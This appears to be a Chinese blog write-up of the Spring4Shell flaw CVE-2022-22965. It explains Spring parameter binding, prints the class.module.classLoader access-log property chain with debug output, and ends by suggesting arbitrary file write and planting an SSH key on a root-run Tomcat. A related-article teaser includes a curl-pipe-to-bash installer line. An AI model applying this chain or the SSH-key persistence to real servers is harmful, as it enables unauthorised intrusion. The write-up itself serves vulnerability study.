Spring rce CVE-2022-22965

原創 功夫小熊貓 2022-04-07 14:29

原理大致是這樣:spring框架在傳參的時候會與當前POJO類自動參數綁定,通過“.”還可以訪問當前類的引用類型變量。使用getClass方法,通過反射機制最終獲取tomcat的日誌配置成員屬性,通過set方法,修改目錄、內容等屬性成員,達到任意文件寫入的目的。

環境:

jdk9、springmvc、tomcat8

一、先來介紹下傳參的問題:

定義2個實體類

public class User {
    private String username;
    private String password;

    public String getPassword() {
        return password;
    }

    public void setPassword(String password) {
        this.password = password;
    }

    public String getUsername() {
        return username;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public SubTest getSub(){
        return new SubTest();
    }
}
public class SubTest {
    public void setsubfunction(String s){
        System.out.println("=====");
        System.out.println(s);
        System.out.println("=====");
    }
}

定義一個Controller類

@RestController
public class HelloController {
    @RequestMapping("/rce")
    @ResponseBody
    public String helloTest(User user) throws IOException {
        System.out.println(user.getPassword());
        System.out.println(user.getUsername());
        return "hello spring : ";
    }
}

不管是GET還是POST,只要是Controller接受的方式都可以傳參賦值。

利用POST方式,傳參

POST /rce HTTP/1.1
Host: 127.0.0.1:8083
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=39A8228CB652B1A3CA4E1B49C87C40AF
Connection: close
Content-Length: 15

username=vpanda

這裏username=vpanda的傳參,調用了User的setUsername方法。

POST /rce HTTP/1.1
Host: 127.0.0.1:8083
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=39A8228CB652B1A3CA4E1B49C87C40AF
Connection: close
Content-Length: 25

sub.subfunction=aaaaatest

這裏sub.subfunction=aaaaatest,實際調用User的getSub方法,獲得SubTest對象後實現setsubfunction方法,傳參aaaaatest,最終實現SubTest類型的setsubfunction。

輸出

=====
aaaaatest
=====

二、接下去直接看POC的利用鏈:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=class.module.classLoader.resources.context.parent.pipeline.first.suffix=class.module.classLoader.resources.context.parent.pipeline.first.directory=class.module.classLoader.resources.context.parent.pipeline.first.prefix=class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

在這裏的實現邏輯是當前user對象getclass獲得了類對象,Class類中存在getModule,獲得module類對象,而Module類又存在getclassloader方法,最終返回一個類加載器。

 調試輸出當前類加載器名稱

System.out.println("===classloader===");
System.out.println(classLoader);
System.out.println("===classloadername===");
System.out.println(classLoader.getClass().getName());
System.out.println("========");
===classloader===
ParallelWebappClassLoader
  context: ROOT
  delegate: false
----------> Parent Classloader:
java.net.URLClassLoader@1b7cc17c

===classloadername===
org.apache.catalina.loader.ParallelWebappClassLoader
========

通過輸出結果可以看到當前對象的類加載器是org.apache.catalina.loader.ParallelWebappClassLoader,

ParallelWebappClassLoader繼承WebappClassLoaderBase,WebappClassLoaderBase實現了getResources是WebResourceRoot接口類型,

WebResourceRoot接口存在getContext方法,Context接口類型,繼承Container,Container實現parent和getPipeline,Pipeline接口實現getfirst,

最終得到Valve類型,通過類對象遍歷所有成員。

Valve first = parallelWebappClassLoader.getResources().getContext().getParent().getPipeline().getFirst();
Class<? extends Valve> aClass = first.getClass();
System.out.println("====DeclaredFields=====");
Field[] fields = aClass.getDeclaredFields();
for (Field field : fields) {
    System.out.println(field);
}
System.out.println("====Methods=====");
Method[] methods = aClass.getMethods();
for (Method method : methods) {
    System.out.println(method);
}

輸出結果,可以看到利用鏈中幾個關鍵成員的set方法。

====DeclaredFields=====
private static final org.apache.juli.logging.Log org.apache.catalina.valves.AccessLogValve.log
private volatile java.lang.String org.apache.catalina.valves.AccessLogValve.dateStamp
private java.lang.String org.apache.catalina.valves.AccessLogValve.directory
protected volatile java.lang.String org.apache.catalina.valves.AccessLogValve.prefix
protected boolean org.apache.catalina.valves.AccessLogValve.rotatable
protected boolean org.apache.catalina.valves.AccessLogValve.renameOnRotate
private boolean org.apache.catalina.valves.AccessLogValve.buffered
protected volatile java.lang.String org.apache.catalina.valves.AccessLogValve.suffix
protected java.io.PrintWriter org.apache.catalina.valves.AccessLogValve.writer
protected java.text.SimpleDateFormat org.apache.catalina.valves.AccessLogValve.fileDateFormatter
protected java.io.File org.apache.catalina.valves.AccessLogValve.currentLogFile
private volatile long org.apache.catalina.valves.AccessLogValve.rotationLastChecked
private boolean org.apache.catalina.valves.AccessLogValve.checkExists
protected java.lang.String org.apache.catalina.valves.AccessLogValve.fileDateFormat
protected volatile java.lang.String org.apache.catalina.valves.AccessLogValve.encoding
private int org.apache.catalina.valves.AccessLogValve.maxDays
private volatile boolean org.apache.catalina.valves.AccessLogValve.checkForOldLogs
====Methods=====
public void org.apache.catalina.valves.AccessLogValve.log(java.io.CharArrayWriter)
public synchronized boolean org.apache.catalina.valves.AccessLogValve.rotate(java.lang.String)
public void org.apache.catalina.valves.AccessLogValve.rotate()
public java.lang.String org.apache.catalina.valves.AccessLogValve.getEncoding()
public void org.apache.catalina.valves.AccessLogValve.setEncoding(java.lang.String)
public void org.apache.catalina.valves.AccessLogValve.setRotatable(boolean)
public boolean org.apache.catalina.valves.AccessLogValve.isRenameOnRotate()
public java.lang.String org.apache.catalina.valves.AccessLogValve.getDirectory()
public void org.apache.catalina.valves.AccessLogValve.setCheckExists(boolean)
public void org.apache.catalina.valves.AccessLogValve.setDirectory(java.lang.String)
public boolean org.apache.catalina.valves.AccessLogValve.isRotatable()
public int org.apache.catalina.valves.AccessLogValve.getMaxDays()
public void org.apache.catalina.valves.AccessLogValve.setMaxDays(int)
public boolean org.apache.catalina.valves.AccessLogValve.isCheckExists()
public java.lang.String org.apache.catalina.valves.AccessLogValve.getFileDateFormat()
public java.lang.String org.apache.catalina.valves.AccessLogValve.getSuffix()
public void org.apache.catalina.valves.AccessLogValve.setRenameOnRotate(boolean)
public void org.apache.catalina.valves.AccessLogValve.setBuffered(boolean)
public boolean org.apache.catalina.valves.AccessLogValve.isBuffered()
public void org.apache.catalina.valves.AccessLogValve.setFileDateFormat(java.lang.String)
public void org.apache.catalina.valves.AccessLogValve.setSuffix(java.lang.String)
public synchronized void org.apache.catalina.valves.AccessLogValve.backgroundProcess()
public java.lang.String org.apache.catalina.valves.AccessLogValve.getPrefix()
public void org.apache.catalina.valves.AccessLogValve.setPrefix(java.lang.String)
public void org.apache.catalina.valves.AbstractAccessLogValve.invoke(org.apache.catalina.connector.Request,org.apache.catalina.connector.Response) throws java.io.IOException,javax.servlet.ServletException
public void org.apache.catalina.valves.AbstractAccessLogValve.log(org.apache.catalina.connector.Request,org.apache.catalina.connector.Response,long)
public int org.apache.catalina.valves.AbstractAccessLogValve.getMaxLogMessageBufferSize()
public void org.apache.catalina.valves.AbstractAccessLogValve.setMaxLogMessageBufferSize(int)
public void org.apache.catalina.valves.AbstractAccessLogValve.setLocale(java.lang.String)
public java.lang.String org.apache.catalina.valves.AbstractAccessLogValve.getLocale()
public boolean org.apache.catalina.valves.AbstractAccessLogValve.getEnabled()
public java.lang.String org.apache.catalina.valves.AbstractAccessLogValve.getCondition()
public void org.apache.catalina.valves.AbstractAccessLogValve.setCondition(java.lang.String)
public java.lang.String org.apache.catalina.valves.AbstractAccessLogValve.getPattern()
public void org.apache.catalina.valves.AbstractAccessLogValve.setConditionUnless(java.lang.String)
public void org.apache.catalina.valves.AbstractAccessLogValve.setIpv6Canonical(boolean)
public java.lang.String org.apache.catalina.valves.AbstractAccessLogValve.getConditionUnless()
public void org.apache.catalina.valves.AbstractAccessLogValve.setPattern(java.lang.String)
public boolean org.apache.catalina.valves.AbstractAccessLogValve.getIpv6Canonical()
public java.lang.String org.apache.catalina.valves.AbstractAccessLogValve.getConditionIf()
public void org.apache.catalina.valves.AbstractAccessLogValve.setConditionIf(java.lang.String)
public void org.apache.catalina.valves.AbstractAccessLogValve.setRequestAttributesEnabled(boolean)
public boolean org.apache.catalina.valves.AbstractAccessLogValve.getRequestAttributesEnabled()
public void org.apache.catalina.valves.AbstractAccessLogValve.setEnabled(boolean)
public java.lang.String org.apache.catalina.valves.ValveBase.toString()
public org.apache.catalina.Valve org.apache.catalina.valves.ValveBase.getNext()
public void org.apache.catalina.valves.ValveBase.setNext(org.apache.catalina.Valve)
public java.lang.String org.apache.catalina.valves.ValveBase.getObjectNameKeyProperties()
public void org.apache.catalina.valves.ValveBase.setContainer(org.apache.catalina.Container)
public java.lang.String org.apache.catalina.valves.ValveBase.getDomainInternal()
public org.apache.catalina.Container org.apache.catalina.valves.ValveBase.getContainer()
public boolean org.apache.catalina.valves.ValveBase.isAsyncSupported()
public void org.apache.catalina.valves.ValveBase.setAsyncSupported(boolean)
public final javax.management.ObjectName org.apache.catalina.util.LifecycleMBeanBase.getObjectName()
public final java.lang.String org.apache.catalina.util.LifecycleMBeanBase.getDomain()
public final javax.management.ObjectName org.apache.catalina.util.LifecycleMBeanBase.preRegister(javax.management.MBeanServer,javax.management.ObjectName) throws java.lang.Exception
public final void org.apache.catalina.util.LifecycleMBeanBase.postRegister(java.lang.Boolean)
public final void org.apache.catalina.util.LifecycleMBeanBase.preDeregister() throws java.lang.Exception
public final void org.apache.catalina.util.LifecycleMBeanBase.postDeregister()
public final void org.apache.catalina.util.LifecycleMBeanBase.setDomain(java.lang.String)
public final synchronized void org.apache.catalina.util.LifecycleBase.init() throws org.apache.catalina.LifecycleException
public final synchronized void org.apache.catalina.util.LifecycleBase.start() throws org.apache.catalina.LifecycleException
public final synchronized void org.apache.catalina.util.LifecycleBase.stop() throws org.apache.catalina.LifecycleException
public final synchronized void org.apache.catalina.util.LifecycleBase.destroy() throws org.apache.catalina.LifecycleException
public org.apache.catalina.LifecycleState org.apache.catalina.util.LifecycleBase.getState()
public java.lang.String org.apache.catalina.util.LifecycleBase.getStateName()
public void org.apache.catalina.util.LifecycleBase.addLifecycleListener(org.apache.catalina.LifecycleListener)
public void org.apache.catalina.util.LifecycleBase.removeLifecycleListener(org.apache.catalina.LifecycleListener)
public org.apache.catalina.LifecycleListener[] org.apache.catalina.util.LifecycleBase.findLifecycleListeners()
public boolean org.apache.catalina.util.LifecycleBase.getThrowOnFailure()
public void org.apache.catalina.util.LifecycleBase.setThrowOnFailure(boolean)
public final void java.lang.Object.wait(long,int) throws java.lang.InterruptedException
public final void java.lang.Object.wait() throws java.lang.InterruptedException
public final native void java.lang.Object.wait(long) throws java.lang.InterruptedException
public boolean java.lang.Object.equals(java.lang.Object)
public native int java.lang.Object.hashCode()
public final native java.lang.Class java.lang.Object.getClass()
public final native void java.lang.Object.notify()
public final native void java.lang.Object.notifyAll()

三、復現

在本地測試實現任意文件寫入

將war包傳到服務器,盲打測試

如果使用root權限拉起了tomcat,嘗試將ssh公鑰寫入服務器。

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Qt/C++音視頻開發71-指定mjpeg/h264格式採集本地攝像頭/存儲文件到mp4/設備推流/採集推流

一、前言 用ffmpeg採集本地攝像頭,如果不指定格式的話,默認小分辨率比如640x480使用rawvideo格式,大分辨率比如1280x720使用mjpeg格式,當然前提是這個攝像頭設備要支持這些格式。目前市面上有一些廠家做的本地設備支持

飛揚青雲 2024-04-25 14:40:54

git命令下,mac環境下載依賴相關報錯問題解決方案

1.安裝fundry框架curl -L https://foundry.paradigm.xyz | bash 2.寫入環境變量source /Users/xx/.bashrc 3.foundryup 問題1報錯:致命錯誤:無法訪問 'h

西紅柿愛喫馬鈴薯 2024-04-25 14:40:34

Python函數參數爲列表問題

def ADD(a): print(3,a,hex(id(a))) a.remove(2) print(3,a,hex(id(a))) a=a.append(10)

Danlis 2024-04-25 14:39:54

使用 NestJS 和 qrcode.js 創建 QR 碼生成器 API

前言 QR碼(Quick Response Code)是一種二維碼,於1994年開發。它能快速存儲和識別數據,包含黑白方塊圖案,常用於掃描獲取信息。QR碼具有高容錯性和快速讀取的優點,廣泛應用於廣告、支付、物流等領域。通過掃描QR碼,用戶可

葡萄城技術團隊 2024-04-25 14:39:44

ebpf在Android安全上的應用:ebpf的一些基礎知識(上篇)

ebpf在Android安全上的應用:ebpf的一些基礎知識(上篇) 一、ebpf介紹 eBPF 是一項革命性的技術,起源於 Linux 內核,它可以在特權上下文中(如操作系統內核)運行沙盒程序。它用於安全有效地擴展內核的功能,而無需通過更

windy_2 2024-04-25 14:36:53

CIRCLEQ_INSERT_AFTER, C語言循環隊列

  CMakeLists.txt # CMakeList.txt : CMake project for llist, include source and define # project specific logic here. #

mingzhanghui 2024-04-25 14:34:32

[MDP.BlazorCore] 快速建立跨Web、App執行的BlazorApp專案

團隊資源受限的時候,使用Blazor開發應用系統,只需開發一份程式碼及使用一種程式語言,就同時產出Web跟App應用系統。 本篇文章,紀錄使用MDP.BlazorCore所提供的樣板,快速建立跨Web、App執行的BlazorApp專案。為

Clark159 2024-04-25 14:32:42

Hessian矩陣以及在血管增強中的應用——OpenCV實現【2024年更新】

有別於廣爲人知的Sobel、Canny等一階算法,基於Hessian矩陣能夠得到圖像二階結果,這將幫助我們深入分析圖像本質。 Hessian矩陣在圖像處理中有着廣泛的應用:其中在圖像分割領域,包括邊緣檢測、紋理分析等;在圖像增強領域,包括邊

jsxyhelu 2024-04-25 14:32:02

七天.NET 8操作SQLite入門到實戰 - (2)第七天Blazor班級管理頁面編寫和接口對接

前言 上一章節我們引入BootstrapBlazor UI組件完成了EasySQLite後臺界面的基本架子的搭建,本章節的主要內容是Blazor班級管理頁面編寫和接口對接。 七天.NET 8 操作 SQLite 入門到實戰詳細教程 第一天

追逐時光 2024-04-25 14:30:41

WPF開源輕便、快速的桌面啓動器

前言 今天大姚給大家分享一款WPF開源、簡單、輕便、快速的桌面啓動器(支持多主題、多語言:簡體中文、繁體中文、英文等):CurvaLauncher。 WPF介紹 WPF 是一個強大的桌面應用程序框架,用於構建具有豐富用戶界面的 Window

追逐時光 2024-04-25 14:30:41

MySQL 分庫分表方案,總結太全了。。

來源:https://www.cnblogs.com/405845829qq/p/7552736.html 前言 公司最近在搞服務分離,數據切分方面的東西,因爲單張包裹表的數據量實在是太大,並且還在以每天60W的量增長。 之前瞭解過數據庫的

Java技術棧 2024-04-25 14:30:11

公司來了個新同事,把 DDD 運用得爐火純青!

前言 我們生活中都聽說了DDD,也瞭解了DDD,那麼怎麼將一個新項目從頭開始按照DDD的過程進行劃分與架構設計呢? 一、專業術語 各種服務 IAAS:基礎設施服務,Infrastructure-as-a-service PAAS:平臺服務

Java技術棧 2024-04-25 14:30:11

抖音的倒水問題, 計算機bfs求解

暴力求解 bfs方法.並且找到的一定是最少步驟 問題: 抖音上面又來了一個倒水遊戲 例子: 3個杯子, 容量12, 9, 5 上來12是滿的. 然後都沒有刻度只能倒到一個滿這種倒法, 然後最後希望倒出2個6ml的. # 抖音上面又來了一個倒

張博的博客 2024-04-25 14:28:41

tar和zip包加密解密壓縮

    1、概述 嗯,最近有些機密文件無處安放,因爲太機密了,後來確定加密後放到服務器上。研究一番後發現tar和zip命令都能實現,所以在此記錄一下。 壓縮:tar -zcvf - ./packageTest | openssl des3

馬昌偉 2024-04-25 14:22:40

解決mysql 事務死鎖的方法

使用以下命令查看引擎的狀態 SHOW ENGINE INNODB STATUS;   如果有事務死鎖可以看到如下圖的關鍵字   找到上圖的線程id 使用 kill 57763 .解決問題。 問題回放,事務死鎖如何產生? 本地調試

雨V幕 2024-04-25 14:22:00